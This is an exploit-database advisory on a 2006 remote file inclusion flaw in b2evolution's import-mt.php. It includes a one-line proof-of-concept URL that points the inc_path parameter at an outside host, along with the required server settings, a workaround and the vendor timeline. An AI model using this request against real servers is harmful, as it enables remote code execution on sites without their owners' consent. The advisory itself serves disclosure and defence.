b2evolution Remote File inclusion Vulnerability

vendor:

b2evolution

by:

tarkus

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: b2evolution

Affected Version From: b2evolution 1.8.5

Affected Version To: b2evolution 1.9 beta

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

b2evolution Remote File inclusion Vulnerability

Line 67 of import-mt.php (blogs/inc/CONTROL/imports) contains a vulnerability that allows an attacker to include a remote file. The PoC requires register_globals and allow_url_fopen to be On.

Mitigation:

Put the following line at the beginning of the file: if( !defined('EVO_MAIN_INIT') ) die( 'Please, do not access this page directly.' );

Source

Exploit-DB raw data:

Severity: High
 Title: b2evolution Remote File inclusion Vulnerability
 Date: 28.11.06
 Author: tarkus (tarkus (at) tiifp (dot) org)
 Web: https://tiifp.org/tarkus
 Vendor: b2evolution (http://b2evolution.net/)
 Affected Product(s): b2evolution 1.8.5 - 1.9 beta
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Description:
------------

Line 67 of import-mt.php (blogs/inc/CONTROL/imports):

>
>require_once $inc_path.'MODEL/files/_file.funcs.php';
>



PoC:
----

http://<victim>/<b2epath>/inc/CONTROL/imports/import-mt.php?basepath=foo&inc_path=https://tiifp.org/tarkus/PoC/

register_globals and allow_url_fopen have to be On


Workaround:
-----------

Put the following line at the beginning of the file.

if( !defined('EVO_MAIN_INIT') ) die( 'Please, do not access this page \
directly.' );



Vendor Response:
----------------

Reported to Vendor:     10.11.06
Vendor response:        10.11.06
Patch in CVS:           10.11.06

# milw0rm.com [2006-11-29]